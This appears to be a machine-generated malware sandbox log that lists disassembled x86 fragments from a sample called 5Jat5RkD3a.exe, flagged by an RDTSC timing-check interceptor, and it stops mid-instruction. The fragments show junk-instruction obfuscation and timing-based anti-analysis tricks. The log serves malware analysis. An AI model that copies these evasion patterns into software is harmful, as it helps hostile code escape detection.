Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70314EF second address: 7031516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C45629h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080B48 second address: 7080B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080B60 second address: 7080B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD934C4561Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 702006C second address: 7020072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7020072 second address: 7020093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C4561Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7020093 second address: 70200A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC001B second address: 6FC0030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0030 second address: 6FC0062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934BC97E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0062 second address: 6FC0071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0071 second address: 6FC00BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97DBh 0x00000009 sbb cx, 0D7Eh 0x0000000e jmp 00007FD934BC97E9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD934BC97E3h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00BA second address: 6FC00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00C0 second address: 6FC00E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, F9A7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934BC97E9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00E8 second address: 6FC00F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C4561Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00F8 second address: 6FC00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00FC second address: 6FC0135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD934C45627h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD934C45625h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0135 second address: 6FC013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0724 second address: 6FC075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD934C45622h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FD934C4561Ah 0x00000018 sub si, F828h 0x0000001d jmp 00007FD934C4561Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC075F second address: 6FC07BD instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3FD4491Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushfd 0x0000000d jmp 00007FD934BC97DEh 0x00000012 add cl, FFFFFF88h 0x00000015 jmp 00007FD934BC97DBh 0x0000001a popfd 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FD934BC97E6h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD934BC97E7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC07BD second address: 6FC07EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD934C4561Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC07EA second address: 6FC07EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF013D second address: 6FF01CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FD934C4561Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD934C45621h 0x00000017 adc cx, 2D76h 0x0000001c jmp 00007FD934C45621h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FD934C45620h 0x00000028 add ecx, 0DDDCA98h 0x0000002e jmp 00007FD934C4561Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FD934C45620h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF01CD second address: 6FF01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF01D3 second address: 6FF022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 13D3h 0x00000007 pushfd 0x00000008 jmp 00007FD934C45628h 0x0000000d xor si, CF58h 0x00000012 jmp 00007FD934C4561Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c jmp 00007FD934C45626h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD934C4561Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF022F second address: 6FF0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF0241 second address: 6FF02F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FD934C45626h 0x00000011 mov edi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov ecx, 6F67F98Dh 0x0000001a mov si, A189h 0x0000001e popad 0x0000001f mov dword ptr [esp+24h], 00000000h 0x00000027 pushad 0x00000028 mov ch, F8h 0x0000002a mov ebx, 5DE124F2h 0x0000002f popad 0x00000030 lock bts dword ptr [edi], 00000000h 0x00000035 pushad 0x00000036 mov eax, edi 0x00000038 popad 0x00000039 jc 00007FD9A52977B8h 0x0000003f jmp 00007FD934C4561Dh 0x00000044 pop edi 0x00000045 pushad 0x00000046 mov cl, 03h 0x00000048 pushfd 0x00000049 jmp 00007FD934C45629h 0x0000004e adc esi, 58666B26h 0x00000054 jmp 00007FD934C45621h 0x00000059 popfd 0x0000005a popad 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f call 00007FD934C45623h 0x00000064 pop ecx 0x00000065 mov cl, dl 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF02F6 second address: 6FF0343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97E1h 0x00000009 sub ecx, 778EADE6h 0x0000000f jmp 00007FD934BC97E1h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FD934BC97DAh 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD934BC97DAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF0343 second address: 6FF0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70108C0 second address: 70108C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70108C6 second address: 70108CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203AD second address: 70203D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, DF47h 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934BC97E5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203D1 second address: 70203F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD934C4561Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203F5 second address: 70203FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203FB second address: 70203FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203FF second address: 7020455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bl, EFh 0x0000000c mov cx, 63F7h 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov edi, ecx 0x00000016 pushfd 0x00000017 jmp 00007FD934BC97E4h 0x0000001c add ch, 00000018h 0x0000001f jmp 00007FD934BC97DBh 0x00000024 popfd 0x00000025 popad 0x00000026 push dword ptr [ebp+04h] 0x00000029 pushad 0x0000002a jmp 00007FD934BC97E4h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7020455 second address: 7020473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 6E8Dh 0x00000008 popad 0x00000009 popad 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934C4561Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709067C second address: 7090682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090682 second address: 7090686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090686 second address: 709068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709068A second address: 70906DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934C45622h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 jmp 00007FD934C45623h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FD934C45626h 0x0000001f mov dl, byte ptr [ebp+14h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov eax, ebx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70906DE second address: 7090704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov si, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090704 second address: 7090733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45620h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dl, 00000007h 0x0000000c jmp 00007FD934C45620h 0x00000011 test eax, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090733 second address: 7090737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090737 second address: 709073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709073D second address: 7090743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090743 second address: 7090747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090747 second address: 709077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD9A519F26Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD934BC97E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709077A second address: 709079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709079F second address: 70907BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070DDC second address: 7070DEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070DEF second address: 7070E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 85h 0x00000005 mov esi, 48BEA5C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FD934BC97DAh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD934BC97DDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E19 second address: 7070E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E1D second address: 7070E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E23 second address: 7070E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E29 second address: 7070E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080382 second address: 7080388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080388 second address: 7080399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080399 second address: 7080420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007FD934C45623h 0x00000014 sub ecx, 084820BEh 0x0000001a jmp 00007FD934C45629h 0x0000001f popfd 0x00000020 pop eax 0x00000021 pushad 0x00000022 mov si, bx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FD934C4561Bh 0x00000033 sub al, FFFFFFCEh 0x00000036 jmp 00007FD934C45629h 0x0000003b popfd 0x0000003c push eax 0x0000003d pop ebx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080420 second address: 7080461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD934BC97DEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD934BC97E0h 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD934BC97DAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080461 second address: 7080470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080470 second address: 7080488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080488 second address: 708053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934C4561Eh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov al, A9h 0x00000012 pushfd 0x00000013 jmp 00007FD934C45623h 0x00000018 xor ax, D5AEh 0x0000001d jmp 00007FD934C45629h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007FD934C4561Eh 0x0000002a push eax 0x0000002b pushad 0x0000002c call 00007FD934C45621h 0x00000031 mov ah, 68h 0x00000033 pop edi 0x00000034 push eax 0x00000035 pushfd 0x00000036 jmp 00007FD934C45629h 0x0000003b adc cx, 55F6h 0x00000040 jmp 00007FD934C45621h 0x00000045 popfd 0x00000046 pop ecx 0x00000047 popad 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov bx, cx 0x0000004f mov cl, B2h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 708053A second address: 7080540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080540 second address: 70805A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FD934C45624h 0x00000010 sub ecx, ecx 0x00000012 pushad 0x00000013 mov ebx, 16A1DA42h 0x00000018 pushfd 0x00000019 jmp 00007FD934C45623h 0x0000001e and cx, 013Eh 0x00000023 jmp 00007FD934C45629h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70805A3 second address: 70805B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70805B5 second address: 70805B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70805B9 second address: 7080609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934BC97DEh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD934BC97DEh 0x00000016 add ch, FFFFFFC8h 0x00000019 jmp 00007FD934BC97DBh 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 mov eax, 00000001h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD934BC97DCh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080609 second address: 708060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 708060F second address: 7080620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080620 second address: 7080663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lock cmpxchg dword ptr [esi], ecx 0x0000000f jmp 00007FD934C4561Eh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a mov dl, cl 0x0000001c popad 0x0000001d cmp ecx, 01h 0x00000020 pushad 0x00000021 call 00007FD934C4561Bh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080663 second address: 70806A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edi, 78C3478Ah 0x0000000a popad 0x0000000b jne 00007FD9A518B736h 0x00000011 jmp 00007FD934BC97E1h 0x00000016 pop edi 0x00000017 pushad 0x00000018 mov ecx, 35879163h 0x0000001d mov eax, 17D7E0BFh 0x00000022 popad 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD934BC97E1h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 70402F3 second address: 70403A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 64D9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD934C4561Eh 0x00000012 adc ax, 1D68h 0x00000017 jmp 00007FD934C4561Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD934C45626h 0x00000024 and cx, 6FC8h 0x00000029 jmp 00007FD934C4561Bh 0x0000002e popfd 0x0000002f movzx eax, di 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [esp], ebp 0x00000037 pushad 0x00000038 jmp 00007FD934C45621h 0x0000003d pushfd 0x0000003e jmp 00007FD934C45620h 0x00000043 sbb eax, 5423B558h 0x00000049 jmp 00007FD934C4561Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov ebp, esp 0x00000052 pushad 0x00000053 jmp 00007FD934C4561Bh 0x00000058 popad 0x00000059 xchg eax, 